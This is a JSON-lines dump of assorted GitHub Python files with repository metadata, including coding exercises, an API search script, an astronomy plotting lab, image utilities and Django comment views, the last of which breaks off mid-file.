self._add_host_to_composed_groups(\n self.get_option('groups'),\n variables,\n inventory_hostname,\n self.get_option('strict'),\n )\n\n # Add host to keyed groups\n self._add_host_to_keyed_groups(\n self.get_option('keyed_groups'),\n variables,\n inventory_hostname,\n self.get_option('strict'),\n )\n","repo_name":"varungarg26/monitor-me","sub_path":"venv/lib/python3.9/site-packages/ansible_collections/community/libvirt/plugins/inventory/libvirt.py","file_name":"libvirt.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2140453033","text":"\"\"\"R-7.11: Implement a function, with calling syntax ``max(L)``, that returns the maximum element\n from a ``PositionalList`` instance ``L`` containing comparable elements.\"\"\"\nimport random\n\nfrom Goodrich.Chapter7.positional_list import PositionalList\n\n\ndef Max(L: PositionalList):\n m = 0\n q = L.after(L.first())\n for p in L:\n if (p > q.element()) and (p > m) and (q is not None):\n m = p\n q = L.after(q)\n return m\n\n\n# Instantiate doubly linked list and populate incrementally from 1 to 10.\ndbll = PositionalList()\n# noinspection PyProtectedMember\ncur = dbll._header\nfor i in range(1, 11):\n # noinspection PyProtectedMember\n dbll._insert_between(i, cur, dbll._trailer)\n cur = cur.next\n\n# Get max item.\nprint(Max(dbll))\n\n# Also: PositionalList class already defines an iterable generator, simply call inbuilt max function.\nprint(max(dbll))\n\n# Let's try that again with numbers from 1 to 10.\ndbll = PositionalList()\n# noinspection PyProtectedMember\ncur = dbll._header\nfor i in random.sample(range(1, 11), 10):\n # noinspection PyProtectedMember\n dbll._insert_between(i, cur, dbll._trailer)\n cur = cur.next\nprint(Max(dbll))\nprint(max(dbll))\n","repo_name":"awwalm/DSAlgoPy","sub_path":"Goodrich/Chapter7/Exercises/Reinforcement/R-7_11.py","file_name":"R-7_11.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"33861255832","text":"\"\"\"\n1457. Pseudo-Palindromic Paths in a Binary Tree\nhttps://leetcode.com/problems/pseudo-palindromic-paths-in-a-binary-tree/\n\nGiven a binary tree where node values are digits from 1 to 9. A path in the binary tree is said to be pseudo-palindromic if at least one permutation of the node values in the path is a palindrome.\n\nReturn the number of pseudo-palindromic paths going from the root node to leaf nodes.\n\n \n\nExample 1:\n\n\nInput: root = [2,3,1,3,1,null,1]\nOutput: 2 \nExplanation: The figure above represents the given binary tree. There are three paths going from the root node to leaf nodes: the red path [2,3,3], the green path [2,1,1], and the path [2,3,1]. Among these paths only red path and green path are pseudo-palindromic paths since the red path [2,3,3] can be rearranged in [3,2,3] (palindrome) and the green path [2,1,1] can be rearranged in [1,2,1] (palindrome).\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def pseudoPalindromicPaths (self, root: TreeNode) -> int:\n \n def dfs(root, count=0):\n if not root: return 0\n count ^= 1 << (root.val - 1)\n res = dfs(root.left, count) + dfs(root.right, count)\n if root.left == root.right:\n if count & (count - 1) == 0:\n res += 1\n return res\n \n return dfs(root)\n\n","repo_name":"EvanTian233/Leetcode-solutions","sub_path":"Python_Solutions/Algorithms/3_1_DFS/PseudoPalindromicPaths.py","file_name":"PseudoPalindromicPaths.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24998889430","text":"#! /usr/bin/env python3\n'''\nSearch MobyGames for a given game\n'''\n\n# imports\nfrom json import loads as jloads\nfrom urllib.parse import quote\nfrom urllib.request import Request, urlopen\nimport argparse\n\n# constants\nBASE_URL = 'https://api.mobygames.com/v1/games'\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'\nMIN_YEAR = 0\nMAX_YEAR = 2100\nPLATFORM_ID = {\n 'GB': 10,\n 'GBA': 12,\n 'GBC': 11,\n 'GC': 14,\n 'N64': 9,\n 'PSX': 6,\n 'PS2': 7,\n 'PS3': 81,\n 'PSP': 46,\n 'Switch': 203,\n 'Wii': 132,\n 'XBOX': 13,\n 'XBOX360': 69,\n}\n\n# main program\nif __name__ == \"__main__\":\n # parse user args\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-k', '--api_key', required=True, type=str, help=\"MobyGames API Key\")\n parser.add_argument('-t', '--title', required=False, type=str, default=None, help=\"Title\")\n parser.add_argument('-p', '--platform', required=False, type=str, default=None, help=\"Platform (options: %s)\" % ', '.join(sorted(PLATFORM_ID.keys())))\n parser.add_argument('-o', '--output', required=False, type=str, default='stdout', help=\"Output File (TSV)\")\n args = parser.parse_args(); url = BASE_URL\n\n # parse API key\n if not args.api_key.startswith('moby_'):\n raise ValueError(\"Invalid API Key (must start with 'moby_'): %s\" % args.api_key)\n url += ('?api_key=%s' % args.api_key)\n\n # parse title\n if args.title is not None:\n url += ('&title=%s' % quote(args.title, safe=''))\n\n # parse platform\n if args.platform is not None:\n try:\n url += ('&platform=%d' % PLATFORM_ID[args.platform.strip().upper()])\n except:\n raise ValueError(\"Invalid platform: %s\" % args.platform)\n\n # search MobyGames\n req = Request(url, data=None, headers={'User-Agent':USER_AGENT})\n data = jloads(urlopen(req).read())\n if args.output.strip().lower() == 'stdout':\n from sys import stdout as out_f\n else:\n out_f = open(args.output, 'w')\n out_f.write('Title\\tRelease Date\\tPlatform\\tGenre\\tDescription (HTML)\\n')\n for game_data in data['games']:\n out_f.write(game_data['title'])\n out_f.write('\\t%s\\t%s' % sorted((curr['first_release_date'].strip(),curr['platform_name'].strip()) for curr in game_data['platforms'])[0])\n out_f.write('\\t%s' % ', '.join(sorted(curr['genre_name'] for curr in game_data['genres'])))\n out_f.write('\\t')\n if 'description' in game_data and game_data['description'] is not None:\n out_f.write('\\t%s' % game_data['description'].replace('\\n','').strip())\n out_f.write('\\n')\n out_f.close()\n","repo_name":"niemasd/GameDB","sub_path":"helper/search_mobygames.py","file_name":"search_mobygames.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13498464332","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 25 14:26:04 2018\r\n\r\n@author: Ashvini\r\n\"\"\"\r\n\r\nfrom astropy.io import fits\r\nfrom astropy.io import ascii\r\nfrom astropy.table import Table\r\nimport numpy as np\r\nfrom astropy.cosmology import LambdaCDM\r\nfrom astropy import units as u\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.gridspec import GridSpec\r\n\r\nlab = fits.open('lab1-data.fits')\r\ndata = Table(lab[1].data)\r\n\r\ndata2 = Table(lab[1].data)\r\ndata2.remove_column('REDSHIFT')\r\n\r\ndata2['name'] = np.arange(len(data))\r\nsearch = data2[('name','RA','DEC')]\r\n\r\nascii.write(data, 'data.txt', overwrite = True)\r\nascii.write(search, 'data2.txt', overwrite = True)\r\n\r\nsdss = ascii.read('star_data.csv')\r\n\r\ni = 0\r\nwhile i < len(data2):\r\n if data2['name'][i] not in sdss['NAME']:\r\n data.remove_row(i)\r\n i+=1\r\n \r\ncosmo = LambdaCDM(H0=70 * u.km / u.s / u.Mpc, Om0=0.3, Ode0=0.7)\r\n\r\nluminosity_distances = []\r\nfor r in data[\"REDSHIFT\"]:\r\n luminosity_distances.append(cosmo.luminosity_distance(r))\r\n\r\nDM = []\r\nfor d in luminosity_distances:\r\n DM.append((5*np.log10(d/(10 * u.pc))))\r\n\r\nabsMag = []\r\nfor mag, dist_mod in zip(sdss['modelMag_i'], DM):\r\n absMag.append(mag - dist_mod.value)\r\n#%%\r\nra = data['RA']\r\ndec = data['DEC']\r\n\r\ndef projection(ra, dec, proj = 'aitoff', org = 0, facecolor = 'LightCyan', mcolor = 'b', alpha = 0.3, title = ''):\r\n ra = np.remainder(ra+360-org,360) # shift RA values\r\n ra[ra>180] -=360 # scale conversion to [-180, 180]\r\n ra=-ra # reverse the scale: East to the left\r\n tick_labels = np.array([150, 120, 90, 60, 30, 0, 330, 300, 270, 240, 210])\r\n tick_labels = np.remainder(tick_labels+360+org,360)\r\n \r\n #1 hr = 15 deg \r\n labels =[]\r\n for label in tick_labels: #in degrees, want hrs\r\n labels.append(str(int(label*(1/15))) + '$^h$')\r\n \r\n fig = plt.figure(figsize=(8,4.2))\r\n ax = fig.add_subplot(111, projection= proj, facecolor = facecolor)\r\n plt.plot(np.radians(ra),np.radians(dec), 'o', color = mcolor , markersize=4, alpha=alpha) # convert degrees to radians\r\n ax.set_title(title, y=1.08, fontsize = 14) \r\n ax.set_xticklabels(tick_labels, visible = False)\r\n ax.set_xticklabels(labels, visible = True)\r\n ax.set_xlabel(\"RA\")\r\n ax.xaxis.label.set_fontsize(12)\r\n ax.set_ylabel(\"Dec\")\r\n ax.yaxis.label.set_fontsize(12)\r\n ax.grid(True)\r\n return fig\r\n\r\nprojection(ra, dec, org = 120, facecolor = 'azure', mcolor = 'deeppink', alpha = 0.5, title = 'Aitoff Projection of Quasar Sample').savefig('Aitoff Projection.png')\r\n#%%\r\nfig=plt.figure(figsize=(8,8))\r\ngs=GridSpec(6,6) # 6 rows, 6 columns\r\n\r\nax1=fig.add_subplot(gs[0:5:,0]) #histogram of absolute magnitude i\r\nax2=fig.add_subplot(gs[5,1:6]) #histogram of redshift\r\nax3=fig.add_subplot(gs[0:5, 1:6]) #redshift vs magnitude i scatterplot\r\n\r\nax3.plot(data['REDSHIFT'], absMag, 'o', color = 'deeppink', markersize=5, alpha=0.5)\r\n\r\nax2.hist(data['REDSHIFT'], bins = 75, color = 'springgreen', alpha=0.5, histtype='bar', ec='g')\r\n\r\nax1.hist(absMag, bins = 50, orientation = 'horizontal', color = 'springgreen', alpha=0.5, histtype='bar', ec='g')\r\n\r\nax3.invert_yaxis()\r\nax1.invert_yaxis()\r\nplt.title('Redshift vs I-band Absolute Magnitude', y=1.02,\r\n fontsize = 14)\r\nax1.set_xlabel(' N',\r\n fontsize = 14)\r\nax1.set_ylabel('$M_{i}$', fontsize = 14)\r\nax2.set_xlabel('Redshift (z)', fontsize = 14)\r\nax3.grid(which ='both')\r\n\r\nax1.xaxis.tick_top()\r\nax2.yaxis.tick_right()\r\n\r\nx_major_ticks = np.arange(0,5.25, 1)\r\nx_minor_ticks = np.arange(0,5.25, 0.2)\r\n\r\ny_major_ticks = np.arange(-31., -21.75, 1)\r\ny_minor_ticks = np.arange(-31, -21.75, 0.2)\r\n\r\nax1.set_ylim(-22, -30)\r\nax3.set_ylim(-22, -30)\r\n\r\nax2.set_xlim(0, 5)\r\nax3.set_xlim(0, 5)\r\n\r\nax2.set_ylim(0,45)\r\nax1.set_xlim(0,50)\r\n\r\nax1.set_xlim(0,60)\r\nax2.set_ylim(0,50)\r\n\r\nax1.tick_params(which = 'major', direction = 'inout', length = 12)\r\nax1.tick_params(which = 'minor', direction = 'inout', length = 6) \r\n\r\nax2.tick_params(which = 'major', direction = 'inout', length = 12)\r\nax2.tick_params(which = 'minor', direction = 'inout', length = 6)\r\n\r\nax3.tick_params(which = 'major', direction = 'inout', length = 24)\r\nax3.tick_params(which = 'minor', direction = 'inout', length = 6)\r\n\r\nax2.set_xticks(x_major_ticks)\r\nax2.set_xticks(x_minor_ticks, minor=True)\r\n\r\nax1.set_yticks(y_major_ticks)\r\nax1.set_yticks(y_minor_ticks, minor=True)\r\n\r\nax2.set_xticks(x_major_ticks)\r\nax2.set_xticks(x_minor_ticks, minor=True)\r\n\r\nax3.set_yticks(y_major_ticks)\r\nax3.set_yticks(y_minor_ticks, minor=True)\r\n\r\nax3.set_xticks(x_major_ticks)\r\nax3.set_xticks(x_minor_ticks, minor=True)\r\n\r\nxticklabels = ax3.get_xticklabels()\r\nplt.setp(xticklabels, visible=False)\r\n\r\nyticklabels = ax3.get_yticklabels()\r\nplt.setp(yticklabels, visible=False)\r\n\r\nplt.tight_layout(pad=0, w_pad=-1.8\r\n , h_pad=-2.2)\r\n\r\n\r\nfig.savefig('Redshift vs Absolute Magnitude.png')\r\n","repo_name":"akrshnn6/astr-414","sub_path":"Lab 1/ASTR 414 Lab 1.py","file_name":"ASTR 414 Lab 1.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34572486448","text":"#This program\n\ndef nex_prime(num):\n if num == 0 or num == 1:\n num=1\n \n for i in range(num+1, (num+1)*2, 1):\n if prime(i):\n return i\n\ndef prime(num):\n if num == 2:\n return True\n elif num%2==0:\n return False\n elif num == 1:\n return False\n\n for i in range(3, (num//3),2):\n if(num % i == 0):\n return False\n\n return True\n\n\n# main\nif __name__ == \"__main__\":\n #input Number\n num= int(input(\"Enter the Number: \"))\n\n i = nex_prime(num)\n print(\"If givien Number is\",num,\" and the next Prime Number is\",i)\n","repo_name":"KrishothKumar/Python_Practice","sub_path":"next_prime.py","file_name":"next_prime.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17241246850","text":"class test(object):\n\t\"\"\"docstring for test\"\"\"\n\tname = 'default'\n # self为默认传递的实例对象本身,方法中不能直接访问方法类中的属性\n\tdef __init__(self, arg):\n\t\tsuper(test, self).__init__()\n\t\tself.arg = arg\n\t\tprint(self.name)\n\t\t\nt = test(\"test\")\n\n# 检查t对象是否为test的实例\nprint(isinstance(t,test))\n\nt.name = 'lov'\nprint(t.name)\n\n# \n# 所有对象都是type的实例,类也是对象\nprint(type(test))\n\n# 创建test类,对应内存中一块区域,类型为type\n# 创建test类实例时,有开辟新的内存空间创建test类型的对象\n# 在变量-id的映射表中,将id赋给变量 ","repo_name":"sblov/Python_base","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8943153684","text":"# -*- coding:utf-8 -*-\nclass RandomListNode:\n def __init__(self, x):\n self.label = x\n self.next = None\n self.random = None\n\n\nclass Solution:\n # 返回 RandomListNode\n def Clone(self, pHead):\n # write code here\n if pHead is None:\n return None\n self.CloneNodes(pHead)\n self.ConnectRandomNodes(pHead)\n return self.ReConnectNodes(pHead)\n \n # 复制原始链表的任一节点N并创建新节点N',再把N'放在N的后面\n def CloneNodes(self, pHead):\n pNode = pHead\n while pNode:\n pCloned = RandomListNode(pNode.label)\n pCloned.next = pNode.next\n pNode.next = pCloned\n pNode = pCloned.next\n \n # 如果原始链表上的节点N的random指向S,则对应的复制节点N'的random指向S'(S的下一个节点)\n def ConnectRandomNodes(self, pHead):\n pNode = pHead\n while pNode:\n pCloned = pNode.next\n if pNode.random:\n pCloned.random = pNode.random.next\n pNode = pCloned.next\n \n # 把得到的链表拆成两个链表,奇数位置上的节点组成原链表,偶数位置上的节点组成复制链表\n def ReConnectNodes(self, pHead):\n pNode = pHead\n pClonedHead = pHead.next\n while pNode:\n cloneNode = pNode.next\n pNode.next = cloneNode.next\n cloneNode.next = None if cloneNode.next is None else cloneNode.next.next\n pNode = pNode.next\n return pClonedHead\n\n\nif __name__ == \"__main__\":\n p1 = RandomListNode(1)\n p2 = RandomListNode(2)\n p3 = RandomListNode(3)\n p4 = RandomListNode(4)\n p5 = RandomListNode(5)\n p1.next = p2\n p2.next = p3\n p3.next = p4\n p4.next = p5\n p1.random = p3\n p2.random = p5\n p4.random = p2\n\n s = Solution()\n pClone = s.Clone(p1)\n pNode = pClone\n while pNode:\n print(pNode.label)\n pNode = pNode.next\n\n","repo_name":"zhengxiang1994/JIANZHI-offer","sub_path":"test1/demo25.py","file_name":"demo25.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73804422244","text":"from math import factorial\nfrom math import ceil\nclass solution:\n def getPermutation(self, n, k):\n ans = []\n stuff = list(map(str, range(1, n + 1)))\n self.fill(n, k, ans, stuff)\n return ''.join(ans)\n\n def fill(self, n, k, ans, stuff):\n if n > 0:\n x = factorial(n - 1)\n ans.append(stuff.pop(ceil(k/x)-1))\n self.fill(n - 1, k % x, ans, stuff)\n else:\n return\n\nn = 4\nk = 9\nobj = solution()\nprint(obj.getPermutation(n, k))","repo_name":"tanjingjing123/LeetcodeAlgorithms","sub_path":"permulationSequence.py","file_name":"permulationSequence.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20283346416","text":"import os\r\nimport csv\r\nfrom datetime import datetime\r\n\r\n\r\nus_state_abbrev = { \r\n 'Alabama': 'AL', \r\n 'Alaska': 'AK', \r\n 'Arizona': 'AZ', \r\n 'Arkansas': 'AR', \r\n 'California': 'CA', \r\n 'Colorado': 'CO', \r\n 'Connecticut': 'CT', \r\n 'Delaware': 'DE', \r\n 'Florida': 'FL', \r\n 'Georgia': 'GA', \r\n 'Hawaii': 'HI', \r\n 'Idaho': 'ID', \r\n 'Illinois': 'IL', \r\n 'Indiana': 'IN', \r\n 'Iowa': 'IA', \r\n 'Kansas': 'KS', \r\n 'Kentucky': 'KY', \r\n 'Louisiana': 'LA', \r\n 'Maine': 'ME', \r\n 'Maryland': 'MD', \r\n 'Massachusetts': 'MA', \r\n 'Michigan': 'MI', \r\n 'Minnesota': 'MN', \r\n 'Mississippi': 'MS', \r\n 'Missouri': 'MO', \r\n 'Montana': 'MT', \r\n 'Nebraska': 'NE', \r\n 'Nevada': 'NV', \r\n 'New Hampshire': 'NH', \r\n 'New Jersey': 'NJ', \r\n 'New Mexico': 'NM', \r\n 'New York': 'NY', \r\n 'North Carolina': 'NC', \r\n 'North Dakota': 'ND', \r\n 'Ohio': 'OH', \r\n 'Oklahoma': 'OK', \r\n 'Oregon': 'OR', \r\n 'Pennsylvania': 'PA', \r\n 'Rhode Island': 'RI', \r\n 'South Carolina': 'SC', \r\n 'South Dakota': 'SD', \r\n 'Tennessee': 'TN', \r\n 'Texas': 'TX', \r\n 'Utah': 'UT', \r\n 'Vermont': 'VT', \r\n 'Virginia': 'VA', \r\n 'Washington': 'WA', \r\n 'West Virginia': 'WV', \r\n 'Wisconsin': 'WI', \r\n 'Wyoming': 'WY'\r\n } \r\n\r\nfile_list=['employee_data1.csv', 'employee_data2.csv']\r\n\r\n#file_list=['employee_data1.csv','employee_data2.csv']\r\noutput_file_path = os.path.join('output', 'employee_data_final.csv')\r\nwith open(output_file_path, 'w', newline='') as output_data:\r\n field_names=['Emp ID', 'First Name', 'Last Name', 'DOB', 'SSN', 'State']\r\n dict_writer=csv.DictWriter(output_data,fieldnames=field_names)\r\n dict_writer.writeheader()\r\n\r\n for data_file in file_list: \r\n file_path = os.path.join('raw_data',data_file)\r\n \r\n with open(file_path,'r',newline='') as input_data:\r\n\r\n dictReader = csv.DictReader(input_data)\r\n for record in dictReader:\r\n w_record = {}\r\n w_record['Emp ID'] = record['Emp ID']\r\n full_name = str(record['Name']).split(' ')\r\n w_record['First Name'] = full_name[0]\r\n w_record['Last Name'] = full_name[1]\r\n\r\n #date_parts= str(record['DOB']).split('-')\r\n # rec_date = datetime.date(date_parts[0], date_parts[1], date_parts[2])\r\n rec_date= datetime.strptime(record['DOB'],'%Y-%m-%d')\r\n w_record['DOB']=rec_date.strftime('%d/%m/%Y')\r\n w_record['SSN'] = \"***-**-{}\".format(\"\".join(str(record['SSN'])[-4:]))\r\n w_record['State'] = us_state_abbrev[record['State']]\r\n dict_writer.writerow(w_record)\r\n print(w_record)\r\n \r\n\r\n","repo_name":"cahos22/python-challenge","sub_path":"PyBoss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42461817976","text":"#!/opt/alt/python38/bin/python3\n# -*- coding: utf-8 -*\nimport argparse\nfrom playwright.sync_api import sync_playwright\nfrom PIL import Image\nimport re\n\nparser = argparse.ArgumentParser(description=\"Take url and return png and pdf\")\n\nparser.add_argument(\"-u\",help=\"Input the URL to take screenshot.\",required=True)\nparser.add_argument(\"-o\",help=\"Output file.\",required=True)\nargs = parser.parse_args()\ni= 0\nwhile(i<10):\n try:\n with sync_playwright() as p:\n browser = p.chromium.launch()\n page = browser.new_page()\n page.goto(vars(args)[\"u\"])\n page.screenshot(path=vars(args)[\"o\"],full_page=True)\n image1 = Image.open(vars(args)[\"o\"])\n im1 = image1.convert('RGB')\n im1.save(re.sub(r'\\.(png|jpg)+$',\".pdf\",vars(args)[\"o\"]))\n break\n except Exception as e:\n print(e)\n i+=1\n \nprint(\"DONE\")","repo_name":"chrioikon/python_json_short_products","sub_path":"sort_json/take_screenshot.py","file_name":"take_screenshot.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28179704229","text":"import ast\nfrom typing import Set\n\n\nclass SurfaceLevelVisitor(ast.NodeVisitor):\n def __init__(self):\n \"\"\"\n A traverser that finds surface level importable items from the current AST.\n \"\"\"\n self._surface_names = set()\n\n def generic_visit(self, node):\n \"\"\"\n Traverse over any node.\n\n :param node: The node to visit\n \"\"\"\n if isinstance(node, ast.Import) or isinstance(node, ast.ImportFrom):\n return\n\n if isinstance(node, ast.Module):\n super().generic_visit(node)\n\n # possibly importable\n elif isinstance(node, ast.Assign):\n # only one assignment\n if hasattr(node.targets[0], 'id'):\n for val in node.targets:\n self.surface_names.add(val.id)\n # multiple assignments\n else:\n for val in node.targets[0].elts:\n self.surface_names.add(val.id)\n else:\n if hasattr(node, 'name'):\n self.surface_names.add(node.name)\n\n @property\n def surface_names(self) -> Set[str]:\n \"\"\"\n Retrieve the surface names found during traversal.\n\n :return: Surface importable names\n \"\"\"\n return self._surface_names\n\n def reset(self):\n \"\"\"\n Reset the state of the visitor.\n \"\"\"\n self._surface_names.clear()\n","repo_name":"tony-zeidan/EvaseAnalysis","sub_path":"evase/depanalyze/surfacedetector.py","file_name":"surfacedetector.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"21990076186","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://www.azlyrics.com/t/taylorswift.html\"\npage = requests.get(URL)\n\nsoup = BeautifulSoup(page.content, \"html.parser\")\n\ntitles = soup.find(class_=\"listalbum-item\")\n\nprint(titles.prettify())","repo_name":"stewartkwokca/markov-lyrics","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12936708847","text":"# -*- coding:utf-8 -*-\n\nimport cv2\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\n\nBGR_TO_XYZ = cv2.COLOR_BGR2XYZ\nBGR_TO_HSV = cv2.COLOR_BGR2HSV\nBGR_TO_GRAY = cv2.COLOR_BGR2GRAY\n\nLOW_PASS_FILTER = np.ones((3, 3), np.float32)/9\nHIGH_PASS_FILTER = np.array([[1, 1, 1], [1, -9, 1], [1, 1, 1]])\n\n\ndef change_bgr_to_other(image, color_space):\n return cv2.cvtColor(image, color_space)\n\n\ndef change_all_images_from_bgr_to_other(dir_bgr, dir_other, color_space):\n for name_image in listdir(dir_bgr):\n path_image_bgr = join(dir_bgr, name_image)\n path_image_other = join(dir_other, name_image)\n if isfile(path_image_bgr):\n image_bgr = cv2.imread(path_image_bgr)\n image_other = change_bgr_to_other(image_bgr, color_space)\n cv2.imwrite(path_image_other, image_other)\n\n\ndef apply_filter_to_image(image, kernel):\n return cv2.filter2D(image, -1, kernel)\n\n\ndef equalize_bgr_image(image):\n img_yuv = cv2.cvtColor(image, cv2.COLOR_BGR2YUV)\n img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])\n return cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)\n\n\ndef apply_filter_to_all_images(dir_imgs, dir_imgs_filtered, kernel):\n for name_image in listdir(dir_imgs):\n path_img = join(dir_imgs, name_image)\n path_img_filtered = join(dir_imgs_filtered, name_image)\n if isfile(path_img):\n image = cv2.imread(path_img)\n image_filtered = apply_filter_to_image(image, kernel)\n cv2.imwrite(path_img_filtered, image_filtered)\n\n\ndef equalize_all_bgr_images(dir_bgr, dir_equalized):\n for name_image in listdir(dir_bgr):\n path_img_bgr = join(dir_bgr, name_image)\n path_img_equalized = join(dir_equalized, name_image)\n if isfile(path_img_bgr):\n image_bgr = cv2.imread(path_img_bgr)\n image_equalized = equalize_bgr_image(image_bgr)\n cv2.imwrite(path_img_equalized, image_equalized)\n","repo_name":"AleFelix/object-detection-py-faster-rcnn","sub_path":"transform_frames/transform_image.py","file_name":"transform_image.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13097081275","text":"from sys import stdin\n\n\ndef solution(N, nums):\n if N <= 2:\n return 0\n nums.sort()\n\n count = 0\n for i in range(N):\n target = nums[i]\n lp, rp = 0, N-1\n while lp < rp:\n if rp == i:\n rp -= 1\n continue\n if lp == i:\n lp += 1\n continue\n\n summed = nums[lp] + nums[rp]\n if summed == target:\n count += 1\n break\n elif summed < target:\n lp += 1\n elif summed > target:\n rp -= 1\n return count\n\n\nN = int(stdin.readline())\nnums = list(map(int, stdin.readline().strip().split(' ')))\n\nprint(solution(N, nums))\n\n\"\"\"\n3\n0 0 0\n\"\"\"\n\"\"\"\n4\n0 0 1 1\n\"\"\"\n\"\"\"\n7\n0 0 0 0 0 1 1\n\"\"\"","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/1253 좋다.py","file_name":"1253 좋다.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2765754375","text":"# -*- coding: utf8 -*-\nfrom rest_framework import generics\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom horizon.views import APIView\nfrom comment.serializers import (CommentSerializer,\n CommentDetailSerializer,\n CommentListSerializer,\n CommentOpinionRecordSerializer)\nfrom comment.permissions import IsOwnerOrReadOnly\nfrom comment.models import (Comment,\n SOURCE_TYPE_DB,\n CommentOpinionRecord,)\nfrom comment.caches import (CommentCache,\n CommentOpinionModelAction)\nfrom comment.forms import (CommentInputForm,\n CommentListForm,\n CommentDetailForm,\n CommentDeleteForm,\n CommentForResourceListForm,\n CommentOpinionActionForm)\nfrom score.caches import ScoreAction\n\nimport json\n\n\nclass CommentAction(generics.GenericAPIView):\n \"\"\"\n 点评相关功能\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly, )\n\n def is_request_data_valid(self, request, **kwargs):\n instance = SOURCE_TYPE_DB[kwargs['source_type']].get_object(pk=kwargs['source_id'])\n if isinstance(instance, Exception):\n return False, 'The source of %s does not exist.' % kwargs['source_id']\n\n kwargs.pop('content')\n instance = Comment.get_object(user_id=request.user.id, **kwargs)\n if isinstance(instance, Comment):\n return False, 'Can not repeat commented.'\n return True, None\n\n def get_comment_object(self, request, comment_id):\n return Comment.get_object(pk=comment_id, user_id=request.user.id)\n\n def score_action(self, request):\n \"\"\"\n 增加积分及添加积分记录\n \"\"\"\n return ScoreAction.score_action(request, action='comment')\n\n def post(self, request, *args, **kwargs):\n \"\"\"\n 用户点评资源(资源、案例及资讯)\n \"\"\"\n form = CommentInputForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n is_valid, error_message = self.is_request_data_valid(request, **cld)\n if not is_valid:\n return Response({'Detail': error_message}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = CommentSerializer(data=cld, request=request)\n if not serializer.is_valid():\n return Response({'Detail': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n try:\n serializer.save()\n except Exception as e:\n return Response({'Detail': e.args}, status=status.HTTP_400_BAD_REQUEST)\n result = self.score_action(request)\n if isinstance(result, Exception):\n return Response({'Detail': result.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def delete(self, request, *args, **kwargs):\n \"\"\"\n 删除评论\n \"\"\"\n form = CommentDeleteForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n instance = self.get_comment_object(request, cld['id'])\n if isinstance(instance, Exception):\n return Response({'Detail': instance.args}, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = CommentSerializer(instance)\n try:\n serializer.delete(instance)\n except Exception as e:\n return Response({'Detail': e.args}, status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CommentList(generics.GenericAPIView):\n \"\"\"\n 用户点评列表\n \"\"\"\n permission_classes = (IsOwnerOrReadOnly, )\n\n def get_comment_detail_list(self, request):\n return CommentCache().get_comment_list_by_user_id(request.user.id)\n # return Comment.filter_details(user_id=request.user.id)\n\n def post(self, request, *args, **kwargs):\n form = CommentListForm(request.data)\n if not form.is_valid():\n return Response({'Detail': form.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n cld = form.cleaned_data\n details = self.get_comment_detail_list(request)\n serializer = CommentListSerializer(data=details)\n if not serializer.is_valid():\n return 